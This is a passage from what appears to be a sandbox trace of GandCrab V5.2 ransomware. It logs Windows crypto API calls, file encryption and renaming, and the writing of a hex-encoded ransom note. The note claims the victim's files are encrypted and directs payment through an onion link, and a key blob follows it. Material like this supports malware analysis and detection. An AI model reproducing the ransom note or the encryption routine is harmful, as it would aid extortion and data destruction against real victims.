pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5036f8) returned 1 [0070.197] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.197] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0070.197] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.197] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259f130*=0x100) returned 1 [0070.198] GetLastError () returned 0x0 [0070.198] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.198] CryptDestroyKey (hKey=0x5036f8) returned 1 [0070.198] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.198] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.198] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.198] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0070.198] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.198] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5036f8) returned 1 [0070.199] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.199] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0070.199] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.199] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259f130*=0x100) returned 1 [0070.199] GetLastError () returned 0x0 [0070.199] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.199] CryptDestroyKey (hKey=0x5036f8) returned 1 [0070.199] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.199] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.199] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0070.200] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0070.200] ReadFile (in: hFile=0x2b4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259f1dc*=0x11aec, lpOverlapped=0x0) returned 1 [0070.207] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffee514, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.207] WriteFile (in: hFile=0x2b4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x11aec, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259f1c0*=0x11aec, lpOverlapped=0x0) returned 1 [0070.208] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.208] WriteFile (in: hFile=0x2b4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0070.209] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.213] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.213] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.213] CloseHandle (hObject=0x2b4) returned 1 [0070.215] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\iBxnpfNq.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\ibxnpfnq.swf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\iBxnpfNq.swf.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\ibxnpfnq.swf.titwmvjl"), dwFlags=0x1) returned 1 [0070.216] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.216] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0070.216] lstrcmpW (lpString1="Identities", lpString2=".") returned 1 [0070.216] lstrcmpW (lpString1="Identities", lpString2="..") returned 1 [0070.216] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="Identities" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities" [0070.216] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\" [0070.216] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0070.216] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.216] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0070.217] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.217] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0070.217] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.217] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0070.217] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.217] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0070.217] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.217] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.217] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\\\TITWMVJL-DECRYPT.txt") returned 70 [0070.217] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\identities\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0070.218] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x